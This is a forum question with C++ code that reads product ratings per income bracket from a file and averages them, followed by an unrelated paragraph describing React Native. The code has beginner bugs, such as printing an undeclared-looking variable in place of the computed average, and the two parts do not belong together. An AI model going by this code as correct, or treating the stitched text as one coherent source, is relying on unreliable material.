I have figured out how to read A or B or C,
by using an if statement and simply changing
the argument to A or B or C,
but I don't know how to have it read the data for A,
then read B, and then C without intervening.
Here is the code I have so far:
Code:/* This program will display for each income bracket (A,B, & C) the average rating for * product 1. */ #include <iostream> // cout, cin, <<, >> #include <string> // string #include <cstdlib> // exit() #include <cassert> // assert #include <fstream> // ifstream using namespace std; char income, c; int count, incomeB5Up, prod2Ave; double prod1Total; double prod1AveA, prod1AveB; double prod1, prod2; int main() { string fileName; cout << "Enter name of file: "; getline(cin, fileName); ifstream inFile(fileName.data()); assert(inFile.is_open() ); while (inFile.get (c) ) { if (c == 'A') /* get income bracket A information */ { count++; inFile >> prod1 >> prod2; cout << "Product 1 rating: " << prod1 << " Product 2 rating: " << prod2 << " Count: " << count << "\n"; // display prod ratings read from file prod1Total += prod1; cout << "Prod1Total = " << prod1Total << "\n"; // display prod1 total prod1AveA = prod1Total / count; cout << "Average for Product 1 in income class A: " << prod1Ave << "\n\n"; } } cout << "Average for Product 1 in income class A: " << prod1AveA << "\n\n"; } | http://cboard.cprogramming.com/cplusplus-programming/51241-looping-decision.html | CC-MAIN-2014-41 | refinedweb | 315 | 50.03 |
Commandline tool that is platform endepended. Its main features are
This code works on windows, linux and macos.
You will have to install swift standard library. Follow the Swift getting started guide for the platform of your choosing.
You will need to know about using swift package manager.
Integrate in application using SPM, in
Package.swift
.package(name: "ProcessPretty", url: "", <#wanted version#>)
more info on
In a main.swilf or type with
@main
Add
import ProcessPretty to the beginning of every file.
let echoSync = try ProcessPretty(executable: "echo", arguments: ["something to output in sync"]) func sync() { do { try echoSync.run(in: #function, at: #filePath) } catch { exit(EXIT_FAILURE) } } sync()
This looks up task in the
PATH accessible executables. If the executable for the process to run is not found make update the
PATH value.
Inspiration for this is taken from jakeheis/SwiftCLI. SwiftCLI does more than just run a system process. It also makes Commands, a structured way to add arguments and options to a process you run on the commandline. As for commands we use Apple's swift-argument-parser SwiftCLI was too big to use. But the way to run a task is taken from that project and used here.
Swiftpack is being maintained by Petr Pavlik | @ptrpavlik | @swiftpackco | API | Analytics | https://swiftpack.co/package/dooZdev/ProcessPretty | CC-MAIN-2021-39 | refinedweb | 212 | 67.96 |
I've been developing webparts that use regular ASP.NET Usercontrols as content for a while. Up until now we've simply hardcoded the url to the usercontrol location in the webpart class. Moving towards a more standardized product that must support differentiated deployment envrironments I wanted to place the url to the usercontrol in the webpart dwp file.
The docs availible online describes how to annotate the property to read from the dwp file, much like this:
Then you see this in the dwp file template:
< ! - Specify initial values for any additional base class or custom properties here. -->
Well, simply adding an element with the same name as the property simply won't work. Some additional guidance from Redmond Sharepoint team-guy Scott pointed out the missing link:
You've got to annotate the webpartclass with a reasonable namespace like this:
[DefaultProperty("Text"), ToolboxData("<{0}:SearchForm runat=server></{0}:SearchForm>"),XmlRoot(Namespace=""
And then tag your property elements in the dwp file with the same xmlns:
<UserControl xmlns="">URI</UserControl>
And your webpart has an initial propertyvalue after deployment. Thanks Scott!
Awesome. I couldn't figure it out either. Thanks.
I don't want to declare the URL but as soon as i try anything else it doesn't work
What migth I have to define to have my owm Namespace?
Need help about this...
Thanks by advance
<p><ul><li><a href="" target="_blank">Setting custom WebPart Properties in the dwp file</a> </li><li><a href="
How to apply validation for custom properties?
Pingback from User Control Container Web Part « Sharepoint Musing’s
Lipitor unusual side effect. Lipitor when genaric. Is lipitor best for brain lesions. Generic version of lipitor. Lipitor banned. Lipitor.
Lexapro. Gain weight on lexapro. Lexapro and alcohol use.
backlog on sharepoint, crm, office, .net development, architecture and more.. | http://weblogs.asp.net/mnissen/archive/2004/05/20/135744.aspx | crawl-002 | refinedweb | 305 | 57.37 |
fdopendir - Man Page
open directory associated with file descriptor
Prolog
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
Synopsis
#include <dirent.h> DIR *fdopendir(int fd); DIR *opendir(const char *dirname);
Description
The fdopendir() function shall be equivalent to the opendir() function except that the directory is specified by a file descriptor description, other than by means of closedir(), readdir(), readdir_r(), rewinddir(), or seekdir(), the behavior is undefined. Upon calling closedir() the file descriptor shall be closed.
It is unspecified whether the FD_CLOEXEC flag will be set on the file descriptor by a successful call to fdopendir()..
If the type DIR is implemented using a file descriptor, the descriptor shall be obtained as if the O_DIRECTORY flag was passed to open().
Return Value
Upon successful completion, these functions shall return a pointer to an object of type DIR. Otherwise, these functions shall return a null pointer and set errno to indicate the error.
Errors
The fdopendir() function shall fail if:
- EBADF
The fd argument is not a valid file descriptor open for reading.
- ENOTDIR
The descriptor fd is not associated with a directory. a component of a pathname is longer than {NAME_MAX}.
- ENOENT
A component of dirname does not name an existing directory or dirname is an empty string.
- ENOTDIR
A component of dirname names an existing file that is neither a directory nor a symbolic link to a directory.
The opendir() function may fail if:
- ELOOP
More than {SYMLOOP_MAX} symbolic links were encountered during resolution of the dirname.
The following sections are informative.
Examples
Open a Directory Stream
The following program fragment demonstrates how the opendir() function is used.
#include <dirent.h> ... DIR *dir; struct dirent *dp; ... if ((dir = opendir (".")) == NULL) { perror ("Cannot open ."); exit (1); } while ((dp = readdir (dir)) != NULL) { ...
Find And Open a File
The following program searches through a given directory looking for files whose name does not begin with a dot and whose size is larger than 1 MiB.
#include <stdio.h> #include <dirent.h> #include <fcntl.h> #include <sys/stat.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { struct stat statbuf; DIR *d; struct dirent *dp; int dfd, ffd; if ((d = fdopendir((dfd = open("./tmp", O_RDONLY)))) == NULL) { fprintf(stderr, "Cannot open ./tmp directory\n"); exit(1); } while ((dp = readdir(d)) != NULL) { if (dp->d_name[0] == '.') continue; /* there is a possible race condition here as the file * could be renamed between the readdir and the open */ if ((ffd = openat(dfd, dp->d_name, O_RDONLY)) == -1) { perror(dp->d_name); continue; } if (fstat(ffd, &statbuf) == 0 && statbuf.st_size > (1024*1024)) { /* found it ... */ printf("%s: %jdK\n", dp->d_name, (intmax_t)(statbuf.st_size / 1024)); } close(ffd); } closedir(d); // note this implicitly closes dfd return 0; }
Application Usage
The opendir() function should be used in conjunction with readdir(), closedir(), and rewinddir() to examine the contents of the directory (see the Examples section in readdir()). This method is recommended for portability.
Rationale
The purpose of the fdopendir() function is to enable opening files in directories other than the current working directory without exposure to race conditions. Any part of the path of a file could be changed in parallel to a call to opendir(), resulting in unspecified behavior.
Based on historical implementations, the rules about file descriptors apply to directory streams as well. However, this volume of POSIX.1-2017 POSIX.1-2017 POSIX.1-2017.
Future Directions
None.
See Also
closedir(), dirfd(), fstatat(), open(), readdir(), rewinddir(), symlink()
closedir(3p), dirent.h(0p), dirfd(3p), fstatat(3p), ftw(3p), glob(3p), nftw(3p), open(3p), readdir(3p), rewinddir(3p), seekdir(3p), symlink(3p), telldir(3p). | https://www.mankier.com/3p/fdopendir | CC-MAIN-2022-21 | refinedweb | 632 | 58.18 |
I first learned programming in BASIC. Outgrew it, and switched to Fortran. Amusingly, my early Fortran code looked just like BASIC. My early C code looked like Fortran. My early C++ code looked like C. – Walter Bright, the creator of D
Programming in a language is not the same as thinking in that language. A natural side effect of experience with one programming language is that we view other languages through the prism of its features and idioms. Languages in the same family may look and feel similar, but there are guaranteed to be subtle differences that, when not accounted for, can lead to compiler errors, bugs, and missed opportunities. Even when good docs, books, and other materials are available, most misunderstandings are only going to be solved through trial-and-error.
D programmers come from a variety of programming backgrounds, C-family languages perhaps being the most common among them. Understanding the differences and how familiar features are tailored to D can open the door to more possibilities for organizing a code base, and designing and implementing an API. This article is the first of a few that will examine D features that can be overlooked or misunderstood by those experienced in similar languages.
We’re starting with a look at a particular feature that’s common among languages that support Object-Oriented Programming (OOP). There’s one aspect in particular of the D implementation that experienced programmers are sure they already fully understand and are often surprised to later learn they don’t.
Encapsulation
Most readers will already be familiar with the concept of encapsulation, but I want to make sure we’re on the same page. For the purpose of this article, I’m talking about encapsulation in the form of separating interface from implementation. Some people tend to think of it strictly as it relates to object-oriented programming, but it’s a concept that’s more broad than that. Consider this C code:
#include <stdio.h> static size_t s_count; void print_message(const char* msg) { puts(msg); s_count++; } size_t num_prints() { return s_count; }
In C, functions and global variables decorated with
static become private to the translation unit (i.e. the source file along with any headers brought in via
#include) in which they are declared. Non-static declarations are publicly accessible, usually provided in header files that lay out the public API for clients to use. Static functions and variables are used to hide implementation details from the public API.
Encapsulation in C is a minimal approach. C++ supports the same feature, but it also has anonymous namespaces that can encapsulate type definitions in addition to declarations. Like Java, C#, and other languages that support OOP, C++ also has access modifiers (alternatively known as access specifiers, protection attributes, visibility attributes) which can be applied to
class and
struct member declarations.
C++ supports the following three access modifiers, common among OOP languages:
public– accessible to the world
private– accessible only within the class
protected– accessible only within the class and its derived classes
An experienced Java programmer might raise a hand to say, “Um, excuse me. That’s not a complete definition of
protected.” That’s because in Java, it looks like this:
protected– accessible within the class, its derived classes, and classes in the same package.
Every class in Java belongs to a package, so it makes sense to factor packages into the equation. Then there’s this:
- package-private (not a keyword) – accessible within the class and classes in the same package.
This is the default access level in Java when no access modifier is specified. This combined with
protected make packages a tool for encapsulation beyond classes in Java.
Similarly, C# has assemblies, which MSDN defines as “a collection of types and resources that forms a logical unit of functionality”. In C#, the meaning of
protected is identical to that of C++, but the language has two additional forms of protection that relate to assemblies and that are analogous to Java’s
protected and package-private.
internal– accessible within the class and classes in the same assembly.
protected internal– accessible within the class, its derived classes, and classes in the same assembly.
Examining encapsulation in other programming languages will continue to turn up similarities and differences. Common encapsulation idioms are generally adapted to language-specific features. The fundamental concept remains the same, but the scope and implementation vary. So it should come as no surprise that D also approaches encapsulation in its own, language-specific manner.
Modules
The foundation of D’s approach to encapsulation is the module. Consider this D version of the C snippet from above:
module mymod; private size_t _count; void printMessage(string msg) { import std.stdio : writeln; writeln(msg); _count++; } size_t numPrints() { return _count; }
In D, access modifiers can apply to module-scope declarations, not just
class and
struct members.
_count is
private, meaning it is not visible outside of the module.
printMessage and
numPrints have no access modifiers; they are
public by default, making them visible and accessible outside of the module. Both functions could have been annotated with the keyword
public.
Note that imports in module scope are
private by default, meaning the symbols in the imported modules are not visible outside the module, and local imports, as in the example, are never visible outside of their parent scope.
Alternative syntaxes are supported, giving more flexibility to the layout of a module. For example, there’s C++ style:
module mymod; // Everything below this is private until either another // protection attribute or the end of file is encountered. private: size_t _count; // Turn public back on public: void printMessage(string msg) { import std.stdio : writeln; writeln(msg); _count++; } size_t numPrints() { return _count; }
And this:
module mymod; private { // Everything declared within these braces is private. size_t _count; } // The functions are still public by default void printMessage(string msg) { import std.stdio : writeln; writeln(msg); _count++; } size_t numPrints() { return _count; }
Modules can belong to packages. A package is a way to group related modules together. In practice, the source files corresponding to each module should be grouped together in the same directory on disk. Then, in the source file, each directory becomes part of the module declaration:
// mypack/amodule.d mypack.amodule; // mypack/subpack/anothermodule.d mypack.subpack.anothermodule;
Note that it’s possible to have package names that don’t correspond to directories and module names that don’t correspond to files, but it’s bad practice to do so. A deep dive into packages and modules will have to wait for a future post.
mymod does not belong to a package, as no packages were included in the module declaration. Inside
printMessage, the function
writeln is imported from the
stdio module, which belongs to the
std package. Packages have no special properties in D and primarily serve as namespaces, but they are a common part of the codescape.
In addition to
public and
private, the
package access modifier can be applied to module-scope declarations to make them visible only within modules in the same package.
Consider the following example. There are three modules in three files (only one module per file is allowed), each belonging to the same root package.
// src/rootpack/subpack1/mod2.d module rootpack.subpack1.mod2; import std.stdio; package void sayHello() { writeln("Hello!"); } // src/rootpack/subpack1/mod1.d module rootpack.subpack1.mod1; import rootpack.subpack1.mod2; class Speaker { this() { sayHello(); } } // src/rootpack/app.d module rootpack.app; import rootpack.subpack1.mod1; void main() { auto speaker = new Speaker; }
Compile this with the following command line:
cd src dmd -i rootpack/app.d
The
-i switch tells the compiler to automatically compile and link imported modules (excluding those in the standard library namespaces
core and
std). Without it, each module would have to be passed on the command line, else they wouldn’t be compiled and linked.
The class
Speaker has access to
sayHello because they belong to modules that are in the same package. Now imagine we do a refactor and we decide that it could be useful to have access to
sayHello throughout the
rootpack package. D provides the means to make that happen by allowing the
package attribute to be parameterized with the fully-qualified name (FQN) of a package. So we can change the declaration of
sayHello like so:
package(rootpack) void sayHello() { writeln("Hello!"); }
Now all modules in
rootpack and all modules in packages that descend from
rootpack will have access to
sayHello. Don’t overlook that last part. A parameter to the
package attribute is saying that a package and all of its descendants can access this symbol. It may sound overly broad, but it isn’t.
For one thing, only a package that is a direct ancestor of the module’s parent package can be used as a parameter. Consider a module
rootpack.subpack.subsub.mymod. That name contains all of the packages that are legal parameters to the
package attribute in
mymod.d, namely
rootpack,
subpack, and
subsub. So we can say the following about symbols declared in
mymod:
package– visible only to modules in the parent package of
mymod, i.e. the
subsubpackage.
package(subsub)– visible to modules in the
subsubpackage and modules in all packages descending from
subsub.
package(subpack)– visible to modules in the
subpackpackage and modules in all packages descending from
subpack.
package(rootpack) – visible to modules in the
rootpackpackage and modules in all packages descending from
rootpack.
This feature makes packages another tool for encapsulation, allowing symbols to be hidden from the outside world but visible and accessible in specific subtrees of a package hierarchy. In practice, there are probably few cases where expanding access to a broad range of packages in an entire subtree is desirable.
It’s common to see parameterized package protection in situations where a package exposes a common public interface and hides implementations in one or more subpackages, such as a
graphics package with subpackages containing implementations for DirectX, Metal, OpenGL, and Vulkan. Here, D’s access modifiers allow for three levels of encapsulation:
- the
graphicspackage as a whole
- each subpackage containing the implementations
- individual modules in each package
Notice that I didn’t include
class or
struct types as a fourth level. The next section explains why.
Classes and structs
Now we come to the motivation for this article. I can’t recall ever seeing anyone come to the D forums professing surprise about package protection, but the behavior of access modifiers in classes and structs is something that pops up now and then, largely because of expectations derived from experience in other languages.
Classes and structs use the same access modifiers as modules:
public,
package,
package(some.pack), and
private. The
protected attribute can only be used in classes, as inheritance is not supported for structs (nor for modules, which aren’t even objects).
public,
package, and
package(some.pack) behave exactly as they do at the module level. The thing that surprises some people is that
private also behaves the same way.
import std.stdio; class C { private int x; } void main() { C c = new C(); c.x = 10; writeln(c.x); }
Snippets like this are posted in the forums now and again by people exploring D, accompanying a question along the lines of, “Why does this compile?” (and sometimes, “I think I’ve found a bug!”). This is an example of where experience can cloud expectations. Everyone knows what
private means, so it’s not something most people bother to look up in the language docs. However, those who do would find this:
Symbols with private visibility can only be accessed from within the same module.
private in D always means private to the module. The module is the lowest level of encapsulation. It’s easy to understand why some experience an initial resistance to this, that it breaks encapsulation, but the intent behind the design is to strengthen encapsulation. It’s inspired by the C++
friend feature.
Having implemented and maintained a C++ compiler for many years, Walter understood the need for a feature like
friend, but felt that it wasn’t the best way to go about it.
Being able to declare a “friend” that is somewhere in some other file runs against notions of encapsulation.
An alternative is to take a Java-like approach of one class per module, but he felt that was too restrictive.
One may desire a set of closely interrelated classes that encapsulate a concept, and those should go into a module.
So the way to view a module in D is not just as a single source file, but as a unit of encapsulation. It can contain free functions, classes, and structs, all operating on the same data declared in module scope and class scope. The public interface is still protected from changes to the private implementation inside the module. Along those same lines,
protected class members are accessible not just in derived classes, but also in the module.
Sometimes though, there really is a benefit to denying access to private members in a module. The bigger a module becomes, the more of a burden it is to maintain, especially when it’s being maintained by a team. Every place a
private member of a class is accessed in a module means more places to update when a change is made, thereby increasing the maintenance burden. The language provides the means to alleviate the burden in the form of the special package module.
In some cases, we don’t want to require the user to import multiple modules individually. Splitting a large module into smaller ones is one of those cases. Consider the following file tree:
-- mypack ---- mod1.d ---- mod2.d
We have two modules in a package called
mypack. Let’s say that
mod1.d has grown extremely large and we’re starting to worry about maintaining it. For one, we want to ensure that private members aren’t manipulated outside of class declarations with hundreds or thousands of lines in between. We want to split the module into smaller ones, but at the same time we don’t want to break user code. Currently, users can get at the module’s symbols by importing it with
import mypack.mod1. We want that to continue to work. Here’s how we do it:
-- mypack ---- mod1 ------ package.d ------ split1.d ------ split2.d ---- mod2.d
We’ve split
mod1.d into two new modules and put them in a package named
mod1. We’ve also created a special
package.d file, which looks like this:
module mypack.mod1; public import mypack.mod1.split1, mypack.mod1.split2;
When the compiler sees
package.d, it knows to treat it specially. Users will be able to continue using
import mypack.mod1 without ever caring that it’s now split into two modules in a new package. The key is the module declaration at the top of
package.d. It’s telling the compiler to treat this package as the module
mod1. And instead of automatically importing all modules in the package, the requirement to list them as public imports in
package.d allows more freedom in implementing the package. Sometimes, you might want to require the user to explicitly import a module even when a
package.d is present.
Now users will continue seeing
mod1 as a single module and can continue to import it as such. Meanwhile, encapsulation is now more stringently enforced internally. Because
split1 and
split2 are now separate modules, they can’t touch each other’s private parts. Any part of the API that needs to be shared by both modules can be annotated with
package protection. Despite the internal transformation, the public interface remains unchanged, and encapsulation is maintained.
Wrapping up
The full list of access modifiers in D can be defined as such:
public– accessible everywhere.
package– accessible to modules in the same package.
package(some.pack)– accessible to modules in the package
some.packand to the modules in all of its descendant packages.
private– accessible only in the module.
protected(classes only) – accessible in the module and in derived classes.
Hopefully, this article has provided you with the perspective to think in D instead of your “native” language when thinking about encapsulation in D.
Thanks to Ali Çehreli, Joakim Noah, and Nicholas Wilson for reviewing and providing feedback on this article.
7 thoughts on “Lost in Translation: Encapsulation”
export is also an access modifier.
Otherwise, great article.
It’s listed as one, yes, but it serves a very different purpose from those I describe here, so it isn’t relevant to a discussion about encapsulation.
It’s an interesting article.
I find the mention of ‘expectations’ a little watered down, since C++/Java/C# represent perhaps the 3 most widely used langauages on the planet, where private means the same thing in each langauge – for decades now. In other words, a great deal many programmers would expect that. It is not a trivial expectation that a language seeking to attract such programmers should dismiss so easily. That such programmers, when they come to D, need to ‘read the documentation’ just to discover that private means something different, seems an unrealistic burden to put on them. But they will surely learn it one way or the other.
But there are other options a programmer might want in D, besides having everything in a module be friends.
For example, non-friend, non-member functions, inside a module with a class.
Two tightly coupled classes, but properly encapsulated from each other, in the same module.
Static, comile time verification of the use of your types interface by other code in the module…
unittests inside the module that cannot bypass the declared interface of your types.
..the list can go on and on… it’s really easy to think of advantages from being able to better encapsulate/hide information, from other code in the same module.
You cannot do simple things like this in D. Not even the ‘option’ is there.
Additionally, there if major push back from the D community whenever there is a discussion about the possibility of making that an option, for the programmer.
That’s a real shame, and for me, demonstrates a real weakness in the language.
As your article demonstrates, the best D offers to those programmers, are workarounds.
The argument that private class members in a module are more encapsulated if they can’t be accessed from outside the class boundaries within the module is a weak one. It’s an abstract, purely conceptual idea. From a practical perspective, it just isn’t true. Anyone editing the module has access to those private members. As far as the public API is concerned, encapsulation is maintained. D’s solution is not a “workaround”. It’s a common-sense application of private protection to D’s language-specific features.
The only reasonable argument against this feature that I’ve seen is the one I referred to in the article regarding maintenance. You want to minimize the number of points private members are directly accessed so that when a change is made, there are fewer places that need to be updated. It’s why in Java it’s recommended that private members be access through getters/setters even inside the class. In practice, it’s only going to be a potential issue with extremely large classes maintained by teams over a long period of time. And even then, it’s a rare occurrence and is something that is usually going to be caught at compile time.
Java offers no means of solving this problem other than breaking a single class into multiple classes. Large classes in D would present the same potential issue. It would never go away. Private-to-the-module also presents the same issue, but with the more practical remedy that the module can be split into multiple modules and the public interface remains unchanged.
I suspect you and I have had this discussion many times already, but just in case you actually aren’t who I think you are, I’ll just point out the underlying theme of my post: you aren’t thinking in D. I’ve been programming in D since 2003. I can count the number of voices I have heard raising this feature as a potential issue on one hand. The number I’m aware of who have reported running into maintenance issues because of it is zero.
It’s just not a problem in practice. Step outside this idea of the class as some sacrosanct boundary and you’ll eventually come to see that the module as the unit of encapsulation provides exactly the same guarantees.
I just disagree. When a class defines a private member, and then defines a public method that can be called to operate on that private member, then, the only way to operate on that private member variable, should be by that public method – the defined interface.
It’s a core concept in C++/C#/Java. There are no ifs or buts about it. The compiler on those langauges will enforce that constraint, regardless of what code surrounds that class.
Sure, there might be exceptions to that. That’s why C++ got some friends.
Now Walter apparently thought the idea of having friends over here, and over there, is problematic. I agree. But Walters solution, was to make everyone in the module friends – with no ability to unfriend – except through extensive redesign of how and where you layout your code (i.e the one class per module thing).
I tell you, I much prefer to have the ability to define friends, that not have the ablitity to unfriend – in life, as well as in code.
Now you’re telling me, I’ll be fine if other code in the module can just ignore those interface constraints you went to some effort to design, because I have control of that other code in the module?
How can I take that argument seriously, I mean gee!
Just ask Scott Meyers, how many mistakes are in his books, despite the really extensive effort he and others go to, to not have mistakes.
The compiler should prevent you from making such mistakes. The language shouldn’t be telling me, ‘you’ll be fine, you won’t shoot yourself in the foot – just trust yourself that you’re writing correct code’. No! I don’t trust myself from not making mistakes.
So, sorry, but I just cannot take that argument seriously.
And anyway, if D really is a ‘multiparadigm’ langauge, then it shouldn’t demand that I ‘think in D’.
” the only way to operate on that private member variable, should be by that public method”
This is about convincing as “you shouldn’t eat meat on Fridays”. And the rest of your post is similarly lacking in fact or reason. Extending the scope of privacy to a module means that accessing private data within the module is *not* a mistake. That’s very different from Scott Meyers having content errors in his books … talk about an argument not to be taken seriously. And your last sentence makes it clear that you aren’t.
The access modifiers in C# are badly botched, and I’m not just talking about “protected internal” which, in violation of all expectations about adjectives, means protected OR internal … the union of the two access scopes. Remarkably, if you have a virtual protected method in your base class , you can only access it in a derived class via `this` … you *cannot* access it via some other object derived from the base class, because the method may be implemented by a class not derived from yours, so you’re peaking at something supposedly “protected” from you. This nonsense requires you to broaden the access to internal or public even when it’s strictly local to the source file. I’m glad that D has discarded this sort of mathematically strict but pragmatically pita silliness. Some languages, like Nim and Ceylon, have gone further and recognized that the whole idea of “protected” is bogus: | https://dlang.org/blog/2018/11/06/lost-in-translation-encapsulation/?replytocom=6735 | CC-MAIN-2020-50 | refinedweb | 4,021 | 55.03 |
Various releases to change how a test is run (such as adding new exceptions that should be treated as specific outcomes – python unittest uses exceptions to signal outcomes).
In testtools 0.9.2 we have an answer to both those issues. I’m really happy with the data included in outcomes API, ‘TestCase.addDetail’. The API for extending outcomes works, but only addresses part of that issue for now.
Subunit 0.0.4, which is available for older Ubuntu releases in the Subunit releases PPA now, and mostly built on Debian (so it will propogate through to Lucid in due course) has support for the addDetail API. Subunit now depends on testtools, reducing the non-protocol related code and generally making things simpler.
Using those two together, bzr’s parallelised test suite has been improved as well, allowing it to include the log file for tests run in separate processes (previously it was silently discarded). The branch to do this will be merged soon, its just waiting on some sysadmin love to get these new versions into its merge-test environment. This change also provides complete capturing of the log when users want to supply a subunit log containing failed tests. The python code to do this is pretty simple:
def setUp(self): super(TestCase, self).setUp() self.addDetail("log", content.Content(content.ContentType("text", "plain", {"charset": "utf8"}), lambda:[self._get_log(keep_log_file=True)]))
I’ve made a couple of point releases to python-junitxml recently, fixing some minor bugs. I need to figure out how to add the extra data that addDetails permits to the xml output. I suspect its a strict superset and so I’ll have to filter stuff down. If anyone knows about similar extensions done to junit’s XML format before, please leave a comment
Syndicated 2009-12-20 12:33:08 from Code happens | http://www.advogato.org/person/robertc/diary/131.html | CC-MAIN-2014-35 | refinedweb | 309 | 53.81 |
Errors when plotting zeta function parametrically
I have the following piece of code:
def f(x): return(real_part(zeta(1+x*I)).n()) def g(x): return(imag_part(zeta(1+x*I)).n()) parametric_plot([f(x),g(x)], (x,2,10))
It should be moderately clear what I'm trying to do - I want to produce a plot of Riemann zeta function on the line Re(z)=1 using parametric plotting. However, when I try to plot this, I get an error
TypeError: cannot evaluate symbolic expression numerically. I also tried the same thing without the
.n(), but then I get an error
TypeError: unable to coerce to a real number. I couldn't find any help online.
It's worth noting that trying to plot function f(x) I get the same error with
.n(), but it works just fine without it (as opposed to parametric plot). Does anyone have an idea how to fix the issue?
Thanks in advance. | https://ask.sagemath.org/question/34882/errors-when-plotting-zeta-function-parametrically/ | CC-MAIN-2018-39 | refinedweb | 161 | 58.99 |
#include <TestResult.h>
Inheritance diagram for CppUnit::TestResult:
A single instance of this class is used when running the test. It is usually created by the test runner (TestRunner).
This class shouldn't have to be inherited from. Use a TestListener or one of its subclasses to be informed of the ongoing tests. Use a Outputter to receive a test summary once it has finished
TestResult supplies a template method 'setSynchronizationObject()' so that subclasses can provide mutual exclusion in the face of multiple threads. This can be useful when tests execute in one thread and they fill a subclass of TestResult which effects change in another thread. To have mutual exclusion, override setSynchronizationObject() and make sure that you create an instance of ExclusiveZone at the beginning of each method. | http://cppunit.sourceforge.net/doc/1.8.0/class_cpp_unit_1_1_test_result.html | crawl-002 | refinedweb | 129 | 53.21 |
#include <CCAENV262Busy>
class CCAENV262Busy : public CBusy {
CCAENV262Busy(uint32_t base, unsigned crate);
CCAENV262Busy(CCaenIO& module);
CCAENV262Busy(const CCAENV262Busy& rhs);
virtual void GoBusy();
virtual void GoReady();}
This class uses the CAEN V262 I/O register to provide signals needed to implement a computer busy. When you use this module, module outputs have the following meanings:
Note that SHP0 is not a hardware signal. It means that the computer is about to be busy due to data taking stopping or pausing. To use this module you must have an external latch or gate generator in latch mode. The latch should start on the OR of the master trigger and SHP0 it should clear on SHP1.
The module clears are a convenience output and need not be used, however if you can use them, this is quicker than clearing modules in software.
CCAENV262Busy(uint32_t base, unsigned crate);
Construct a busy object.
base is the
base address of the V262 module and
crate the
VME crate in which the module lives.
crate
is an optional parameter that defaults to 0.
CCAENV262Busy(CCaenIO& module);
Constructs a busy object.
module is a
refererence to a
CCaenIO module that
has already been constructed and will be the busy hardware
controlled by this object.
CCAENV262Busy(const CCAENV262Busy& rhs);
Copy constructs a new busy module that is a functional
equivalent to
rhs.
virtual void GoBusy();
Called by the framework to indicate the busy should be asserted. This is not called in response to a gate. Busy in response to a gate must happen at hardware speeds, not software.
virtual void GoReady();
Called by the framework to indicate it is able to react to the next trigger. | http://docs.nscl.msu.edu/daq/newsite/nscldaq-11.0/r71468.html | CC-MAIN-2017-30 | refinedweb | 276 | 62.88 |
Documentation
¶
Overview ¶
The importers package uses go/ast to analyze Go packages or Go files and collect references to types whose package has a package prefix. It is used by the language specific importers to determine the set of wrapper types to be generated.
For example, in the Go file ¶
package javaprogram
import "Java/java/lang"
func F() {
o := lang.Object.New() ...
}
the java importer uses this package to determine that the "java/lang" package and the wrapper interface, lang.Object, needs to be generated. After calling AnalyzeFile or AnalyzePackages, the References result contains the reference to lang.Object and the names set will contain "New".
Index ¶
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
This section is empty.
Types ¶
type PkgRef ¶
PkgRef is a reference to an identifier in a package.
type References ¶
type References struct { // The list of references to identifiers in packages that are // identified by a package prefix. Refs []PkgRef // The list of names used in at least one selector expression. // Useful as a conservative upper bound on the set of identifiers // referenced from a set of packages. Names map[string]struct{} // Embedders is a list of struct types with prefixed types // embedded. Embedders []Struct }
References is the result of analyzing a Go file or set of Go packages.
For example, the Go file ¶
package pkg
import "Prefix/some/Package"
var A = Package.Identifier
Will result in a single PkgRef with the "some/Package" package and the Identifier name. The Names set will contain the single name, "Identifier".
func AnalyzeFile ¶
func AnalyzeFile(file *ast.File, pkgPrefix string) (*References, error)
AnalyzeFile scans the provided file for references to packages with the given package prefix. The list of unique (package, identifier) pairs is returned
func AnalyzePackages ¶
func AnalyzePackages(pkgs []*packages.Package, pkgPrefix string) (*References, error)
AnalyzePackages scans the provided packages for references to packages with the given package prefix. The list of unique (package, identifier) pairs is returned | https://pkg.go.dev/github.com/iRezaaa/mobile@v0.0.0-20191126111539-45e4d750f768/internal/importers | CC-MAIN-2021-49 | refinedweb | 323 | 50.12 |
In my company there is a sophisticate logic layer in Sql Server DB. In order to write tests that will check this code we need to write some T–SQL code. The test methods including a serious of initialization script before and after each one of them. I’m going to share you with a very helpful way to debuging this important code by using SQLCLR abilities.The first thing we should do is to open a new Sql Database Project.
Create a new SQL Server Project, by adding a new project and selecting SQL Server Project Template.
Then we need to add our stored procedure that will run inside the db(using SQL-CLR engine). Lets write a very simple stored procedure (It help us to focus on the global concept).
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void InsertCustomerStoredProcedure(SqlString name)
{
using (SqlConnection connection = new SqlConnection("context connection=true"))
{
SqlCommand command = new SqlCommand();
command.Connection = connection;
command.CommandText = "insert into customers(name) values(@name)";
command.Parameters.Add(new SqlParameter("name",name));
connection.Open();
command.ExecuteNonQuery();
}
}
};
The next step will be a compliation and deploy to the central db.In order to test this code we should used a sql file from the “Test script” library(One of the solution directories).
I added an executable command there. This command is excute our stored procedure:
As you can see, I added a breakpoint in the stored procedure execution line. When I will run this project in “debug” mode the visual studio will stop here.
Ok, something is missing. When I tried to execute it I got this error:Msg 6263, Level 16, State 1, Line 6
Execution of user code in the .NET Framework is disabled. Enable "clr enabled" configuration option. This stored procedure will get a customer name as an input and insert it into the customers table.
That's means that we must enable the SQLCLR debug option in our DB if we want to debug code that is being stored inside it.
The “flag” that indicates about this configuration key exist inside the db. You can look at the current Sql CLR flag by execute this command.
In order to enable the SQL CLR debugging just executes this stored procedure:
exec sp_configure 'clr enabled', 1 reconfigure with override
It's time to start debugging our code. Click the “start debuging” button. The visual studio will stop on the fisrt breakpoint. And after we click on the “Step into” button we will enter directly into our stored procedure implementation but this time in debug mode.
When I'll open the Customers table, we will see that the insertion operation that has been executed in the stored procedure was succeeded.
Furthermore, inside a test script file you can also debug existing stored procedures even if they have been created as normal stored procedures directly in the db. You can step into them in debug mode and see all the parameters that you gave them in the watch window.
So, if you need to debug a sophisticated code that was written in stored procedures it’s really recommended to use this debug abilities to track the flow easily. | http://blogs.microsoft.co.il/aviwortzel/2007/09/30/how-to-debug-a-stored-procedure-in-your-sql-server-2005/ | CC-MAIN-2018-09 | refinedweb | 544 | 57.57 |
React Native is a JavaScript framework that allows you to build cross-platform mobile apps that feel truly native and run smoothly on iOS and Android. React Native arose from React, which offers a pattern for building web and mobile user interfaces in a declarative, efficient, and flexible way.
